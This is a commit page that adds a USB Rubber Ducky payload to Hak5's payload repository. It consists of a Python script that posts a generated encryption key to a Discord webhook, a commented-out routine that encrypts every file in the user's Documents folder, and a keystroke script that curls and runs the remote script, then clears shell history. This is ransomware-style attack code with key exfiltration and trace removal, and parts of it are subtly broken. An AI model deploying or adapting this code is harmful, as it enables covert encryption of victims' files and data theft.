hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge b93594cb9e into 675972662a

Aleff 2024-10-01 02:37:16 -04:00 committed by GitHub
parent 675972662a b93594cb9e
commit b79ae0ddaf
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
3 changed files with 190 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

88
payloads/library/execution/EncryptAllDocuments_Linux/EncryptAllDocumentsScript.py Normal file
View File

@ -0,0 +1,88 @@
"""
____ _ _ _ ____ _____ ____ ___ _ _ ____
| _ \ / \ | \ | |/ ___| ____| _ \ / _ \| | | / ___|
| | | |/ _ \ | \| | | _| _| | |_) | | | | | | \___ \
| |_| / ___ \| |\ | |_| | |___| _ <| |_| | |_| |___) |
|____/_/ \_\_| \_|\____|_____|_| \_\\___/ \___/|____/
Warning: The encryption function has the ability to encrypt the entire folder
specified, including all files and subfolders contained within it. Improper usage or accidental
execution of this function may result in permanent loss of encrypted data. We strongly advise
using this function only if you have a full understanding of what you are doing, and to perform
a complete backup of any data that will be encrypted before proceeding. If you have any doubts
or uncertainties, we recommend seeking professional advice before using this function.
"""
from cryptography.fernet import Fernet
import os
import requests
import subprocess
import json
"""Decrypt function"""
def dec_folder(path, fernet):
for root, files in os.walk(path):
for filename in files:
filepath = os.path.join(root, filename)
if not os.access(filepath, os.R_OK):
continue
if "directory" in str(os.system(f"file {filepath}")):
dec_folder(path=filepath, fernet=fernet)
with open(filepath, "rb") as f:
data = f.read()
decrypted_data = fernet.decrypt(data) # the only one line different from enc_folder
with open(filepath, "wb") as f:
f.write(decrypted_data)
# """Encrypt function"""
# def enc_folder(path, fernet):
# for root, files in os.walk(path):
# for filename in files:
# filepath = os.path.join(root, filename)
# if not os.access(filepath, os.R_OK):
# continue
# if "directory" in str(os.system(f"file {filepath}")):
# enc_folder(path=filepath, fernet=fernet)
# with open(filepath, "rb") as f:
# data = f.read()
# encrypted_data = fernet.encrypt(data) # the only one line different from dec_folder
# with open(filepath, "wb") as f:
# f.write(encrypted_data)
"""Send the key used for encryption"""
def send_key(username, key, discord_webhook_url, INITIAL_PATH, FERNET):
try:
message = {
"username": f"{username}",
"content": f"Key:{key}"
}
message_json = json.dumps(message)
resp = requests.post(discord_webhook_url, data=message_json, headers={'Content-Type': 'application/json'})
if not resp.ok:
raise ValueError("Error sending the key")
# enc_folder(path=INITIAL_PATH, fernet=FERNET)
except:
print("Yoh bro you are safe now, but be very careful next time!!!!")
exit()
"""Just some variables"""
KEY = Fernet.generate_key()
FERNET = Fernet(KEY)
USERNAME = subprocess.check_output(['whoami']).decode('ascii')
INITIAL_PATH = f"/home/{USERNAME}/Documents/"
WEBHOOK_URL = 'https://discord.com/api/webhooks/123/abc'
"""
I moved the sending of the key one execution before encryption so that if there should be any problem
in sending (no connection, firewall blocking sending, etc...) it will not continue encrypting the data.
It is a security measure for the users who will be using this payload.
"""
send_key(username=USERNAME, key=KEY, discord_webhook_url=WEBHOOK_URL, INITIAL_PATH=INITIAL_PATH, FERNET=FERNET)

54
payloads/library/execution/EncryptAllDocuments_Linux/README.md Normal file
View File

@ -0,0 +1,54 @@
# Encrypt All Documents - Linux
A script used to encrypt all documents with the Fernet algorithm.
**Category**: Execution
## Description
A script used to encrypt all documents with the Fernet algorithm.
The main use case for that payload is to have a quick tool to encrypt each of your own documents while saving the key so that you can decrypt everything later.
I see it as a big red movie button for emergencies, the encryption speed is pretty fast and saving the key is pretty much immediate so I would imagine that as the sense of use. Remember that in the Python document you can also find the decryption function that will allow you to return to the original documents at any time, obviously via the saved key so make sure you have properly saved a copy before continuing.
With the new changes only if the key saving is successful you will be able to continue with the encryption. This is a security measure applied for users of the payload.
## Getting Started
### Dependencies
* Internet Connection for the Exfiltration
### Settings
* Set the Discord webhook or whatever you want for the exfiltration
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
</td>
</tr>
</table>
</div>

48
payloads/library/execution/EncryptAllDocuments_Linux/payload.txt Normal file
View File

@ -0,0 +1,48 @@
REM ########################################
REM # |
REM # Title : Encrypt All Documents |
REM # Author : Aleff |
REM # Version : 1.1 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM ########################################
REM ATTENTION - BEFORE USING THIS PAYLOAD MAKE SURE YOU UNDERSTAND WHAT IT DOES
REM
REM Script description
REM
REM The Python code defines a function "cyp_folder" that encrypts all files in a folder (and its subfolders) using the Fernet encryption algorithm. The function takes two arguments: the path of the folder to be encrypted ("path") and a Fernet object ("fernet") that contains the encryption key.
REM
REM Inside the function, the os.walk function is used to obtain a list of all files in the specified folder and its subfolders. For each file found, its full path is created and checked for readability using the os.access function. If the file is not readable, the loop moves on to the next file.
REM
REM The "file" Linux command is then executed to determine if the file is a text file or a directory. If the file is a directory, the "cyp_folder" function is recursively called on the directory.
REM
REM If the file is a text file (or however not a directory), it is opened in binary read mode using the "open" function. The contents of the file are read and then encrypted using the "encrypt" function of the Fernet object.
REM
REM Finally, the file is opened in binary write mode and the encrypted content is written to the file, overwriting the original content.
REM
REM In summary, the code encrypts all files in a folder (and its subfolders) using the Fernet encryption algorithm and overwrites the original content with the encrypted content.
REM
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Reply example.com with YOUR LINK. The Payload should be EncryptAllDocumentsScript.py
DEFINE PAYLOAD example.com
STRING curl
STRING PAYLOAD
STRING > script.py
ENTER
REM It depends by the internet connection, btw 2/3 seconds is a lot for a fiew text line...
DELAY 2000
STIRNG python3 script.py; history -c; exit;
ENTER